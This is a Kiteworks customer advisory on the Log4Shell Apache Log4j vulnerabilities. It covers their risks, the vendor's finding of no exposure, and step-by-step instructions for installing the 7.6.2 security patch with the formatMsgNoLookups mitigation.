“Log4Shell” Apache Vulnerability: What Kiteworks Customers Need To Know
In follow-up to our recent alerts to Kiteworks customers, three vulnerabilities to Apache Log4j Java-based open-source logging library have been discovered. These vulnerabilities (CVE-2021-44228, CVE-2021-45046, CVE-2021-45105) are collectively being referred to as Log4Shell or LogJam. Similar to past exploits like Shellshock or Heartbleed, Log4Shell is a remotely exploitable security flaw that can allow complete system takeover without requiring authentication.
What General Risks Does Log4Shell Pose?
The first vulnerability was reported to Apache by Alibaba Cloud’s security team on November 24, 2021. CVE-2021-44228 is a critical vulnerability that impacts default configurations of multiple Apache frameworks, including Apache Struts2, Apache Solr, Apache Druid, Apache Flink, and others.
As noted in the press, this library is widely used by enterprise software, web applications, and products from Apple, Amazon, Cloudflare, Twitter, Steam, among many others—exposing home users and enterprises alike to ongoing remote code execution attacks. As with Shellshock and Heartbleed exploits, experts predict rising numbers of vulnerable products being discovered in the coming weeks.
Proof-of-concept (POC) exploits are currently being shared online, and threat actors have already started pushing malware that scan for vulnerable servers. Shortly after the initial zero-day vulnerability disclosure and patch release, two additional Log4j vulnerabilities were discovered and patched: CVE-2021-45046 on December 14, and CVE-2021-45105 (which is a denial-of-service [DoS] issue) on December 18.
How Does This Impact Kiteworks Customers?
While the recent Kiteworks 2021 Fall Release (7.6) includes the affected Apache library, our testing has shown no signs of exposure to any of these vulnerabilities. We attempted several of the publicly available POC attacks with no indication of exploitation on the Kiteworks platform. Therefore, we do not currently consider this a P0 vulnerability in our systems and have no indication of Log4Shell being exploited in our systems. Additionally, Kiteworks’ multi-layered protection includes files that are individually encrypted, which means they are not exposed to these kinds of vulnerabilities.
Install the Kiteworks 7.6.2 Security Patch
As a precaution, Kiteworks released a 7.6.2 software update to address these vulnerabilities. This patch release adds the mitigation for CVE-2021-44228, CVE-2021-45046, and CVE-2021-45105 contained in the Solr package as recommended by Apache Solr group. Specifically, it updates the Log4j library to a non-vulnerable version on CentOS 7 systems as well as adds the recommended option “$SOLR_OPTS -Dlog4j2.formatMsgNoLookups=true” to disable the possible attack vector on both CentOS 6 and CentOS 7.
To install the 7.6.2 security update on Kiteworks:
- Sign into the Admin Console on your Kiteworks server.
- On the toolbar, click the System button.
- In the navigation pane, click Software Update.
- On the Software Update page, for the Software Version Opt-In setting, click General Availability.
- Near the bottom of the screen, click the Check for Update button. When an update is found, verify that the version number is 7.6.2 or higher.
- Install the update, click Download Software Update, and then click Run Software Update.
We continue to proactively monitor these vulnerabilities to determine if any permutations occur in the threat vector that change the above assessment. If you have any questions or issues regarding Log4Shell or the 7.6.2 patch, please contact Kiteworks Support.